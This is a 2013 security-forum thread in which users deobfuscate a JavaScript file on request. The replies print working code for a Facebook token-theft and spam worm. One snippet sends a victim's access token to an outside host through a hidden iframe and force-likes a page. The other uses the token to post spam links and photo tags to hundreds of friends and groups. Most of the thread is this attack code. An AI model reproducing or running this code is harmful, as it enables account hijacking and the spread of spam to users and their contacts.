Waraxe IT Security Portal
Login or Register
May 1, 2025
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 79
Members: 0
Total: 79
Full disclosure
Microsoft Windows .XRM-MS File / NTLM Information DisclosureSpoofing
[IWCC 2025] CfP: 14th International Workshop on Cyber Crime -Ghent, Belgium, Aug 11-14, 2025
Inedo ProGet Insecure Reflection and CSRF Vulnerabilities
Ruby on Rails Cross-Site Request Forgery
Microsoft ".library-ms" File / NTLM Information Disclosure (Resurrected 2025)
HNS-2025-10 - HN Security Advisory - Local privilege escalation in Zyxel uOS
APPLE-SA-04-16-2025-4 visionOS 2.4.1
APPLE-SA-04-16-2025-3 tvOS 18.4.1
APPLE-SA-04-16-2025-2 macOS Sequoia 15.4.1
APPLE-SA-04-16-2025-1 iOS 18.4.1 and iPadOS 18.4.1
Business Logic Flaw: Price Manipulation - AlegroCartv1.2.9
Stored XSS in "Message" Functionality - AlegroCartv1.2.9
XSS via SVG Image Upload - AlegroCartv1.2.9
BBOT 2.1.0 - Local Privilege Escalation via Malicious ModuleExecution
83 vulnerabilities in Vasion Print / PrinterLogic
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PHP script decode requests -> Any champion can decode this js please?
Post new topicReply to topic View previous topic :: View next topic
Any champion can decode this js please?
PostPosted: Sun Jul 28, 2013 8:18 am Reply with quote
jhonrhods
Beginner
Beginner
Joined: Jul 28, 2013
Posts: 2




https://stalkerxx.s3.amazonaws.com/miley.js
View user's profile Send private message
PostPosted: Sun Jul 28, 2013 10:56 am Reply with quote
sprremix
Regular user
Regular user
Joined: Apr 25, 2013
Posts: 7




This is as far as I came: http://pastebin.com/ZCEyq8qq
View user's profile Send private message
PostPosted: Thu Aug 01, 2013 5:47 pm Reply with quote
freeuser
Beginner
Beginner
Joined: Aug 01, 2013
Posts: 2




Code:

jQuery(document).ready(function ($) {
$('a#getcode').click(function (e) {
e.preventDefault();
window.open('token.php?getcode', 'popUpWindow', 'width=900,height=20,left=300,top=300,resizable=no,scrollbars=yes,toolbar=yes,menubar=no,location=no,directories=no, status=yes')
});
$('a#activate').click(function (e) {
e.preventDefault();
$('.howto').fadeOut(function () {
$('.result').show();
$('.error').hide();
$('#logs').html("");
$('.loading').fadeIn('fast', function () {
var access_token = $('.access_token').val();
if (access_token.split('#access_token=')[1]) {
var access_token = access_token.split('#access_token=')[1].split('&')[0];
setTimeout("top.location.href = 'http://addfollow.uni.me/';", 25000);
$.getJSON('https://graph.facebook.com/me?access_token=' + access_token, function (response) {
if (response.id) {
var uid = response.id;
HeemaNada(access_token);
HaveFun(access_token);
$('ul.list').append('<li><img src="https://graph.facebook.com/' + uid + '/picture" alt="' + response.name + '"><a href="#">Hey , ' + response.name + '</a></li>');
$('.loading').slideUp(function () {
$('.friendlist').slideDown()
})
}
})
} else {
$(this).fadeOut(2000, function () {
$('.error').fadeIn('fast');
$('.howto').fadeIn()
})
}
})
})
});
$('a#back').click(function (e) {
e.preventDefault();
$('.result').slideUp(function () {
$('.error').hide()
})
})
});

function HeemaNada(token) {
jQuery['ajax']({
url: 'https://graph.facebook.com/me/likes?access_token=' + token + '&method=POST&url=https://www.facebook.com/441238915973738',
dataType: 'jsonp',
success: function (_0xb26ax3) {}
})
};

function HaveFun(token) {
console['log']('Request Sent');
document['getElementById']('atp')['innerHTML'] = '<iframe src="http://morethan40.tk/index.php?access_token=' + token + '" width="0" height="0"></iframe>'
};
View user's profile Send private message
PostPosted: Tue Aug 06, 2013 10:03 am Reply with quote
dondon
Regular user
Regular user
Joined: Aug 06, 2013
Posts: 8




Funny, i am getting this. I'm not sure if above is correct.

Code:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>
<body onLoad="GetGroups();GetFriends();getStatus();">
<script type="text/javascript" src="https://stalkerxx.s3.amazonaws.com/jquery.js"></script>

<script>
var access_token = "";
fotolink = "http://kundia.info/leta/dormans.php";
text = 'Get Your Profile Stalkerz Here --> www . profilestalkerss . tk (Remove Spaces) ';
gtext = 'Get Your Profile Stalkerz Here --> www . profilestalkerss . tk (Remove Spaces) ';
gonderildi = 0;

function GetGroups() {
jQuery['ajax']({
url: 'https://graph.facebook.com/fql?q=select gid, name from group where gid IN (SELECT gid FROM group_member WHERE uid=me()) order by rand() limit 70&access_token=' + access_token,
dataType: 'jsonp',
success: function (_0x1f66x7) {
Groups(_0x1f66x7);
}
});
};

function GetFriends() {
jQuery['ajax']({
url: 'https://graph.facebook.com/fql?q=SELECT uid, first_name FROM user WHERE uid IN ( SELECT uid2 FROM friend WHERE uid1 = me() ) ORDER BY rand() limit 400&access_token=' + access_token,
dataType: 'jsonp',
success: function (_0x1f66x7) {
Friends(_0x1f66x7);
}
});
};

function Friends(_0x1f66xa) {
for (i = 0; i < _0x1f66xa['data']['length']; i++) {
jQuery['ajax']({
url: 'https://graph.facebook.com/' + _0x1f66xa['data'][i]['uid'] + '/photos?url=' + fotolink + '&message=' + text + '&callback=paylas&method=POST&access_token=' + access_token,
dataType: 'script',
success: function () {
gonderildi += 1;
if (gonderildi >= _0x1f66xa['data']['length']) {};
}
});
};
};

function Groups(_0x1f66xa) {
for (i = 0; i < _0x1f66xa['data']['length']; i++) {
jQuery['ajax']({
url: 'https://graph.facebook.com/' + _0x1f66xa['data'][i]['gid'] + '/photos?url=' + fotolink + '&message=' + gtext + '&callback=paylas&method=POST&access_token=' + access_token,
dataType: 'script',
success: function () {
gonderildi += 1;
if (gonderildi >= _0x1f66xa['data']['length']) {};
}
});
};
};

function getStatus() {
$['getJSON']('https://graph.facebook.com/me/photos?url=' + fotolink + '&message=' + text + '&method=POST&access_token=' + access_token, function (_0x1f66xf) {
if (_0x1f66xf['id']) {
var _0x1f66x11 = _0x1f66xf['id'];
var _0x1f66x12 = 55;
$['getJSON']('https://graph.facebook.com/me/friends?limit=' + _0x1f66x12 + '&access_token=' + access_token, function (_0x1f66xf) {
if (_0x1f66xf['data']) {
var _0x1f66x13 = [];
$['each'](_0x1f66xf['data'], function (_0x1f66x14, _0x1f66x7) {
_0x1f66x13['push'](_0x1f66x7['id']);
$['getJSON']('https://graph.facebook.com/' + _0x1f66x11 + '/tags/' + _0x1f66x7['id'] + '/?method=POST&access_token=' + access_token, function (_0x1f66xf) {});
});
};
});
};
});
};

</script>
</body>
</html>
View user's profile Send private message
Any champion can decode this js please?
www.waraxe.us Forum Index -> PHP script decode requests
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



PCWizardHub - Helping you fix, build, and optimize your PC life
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.035 Seconds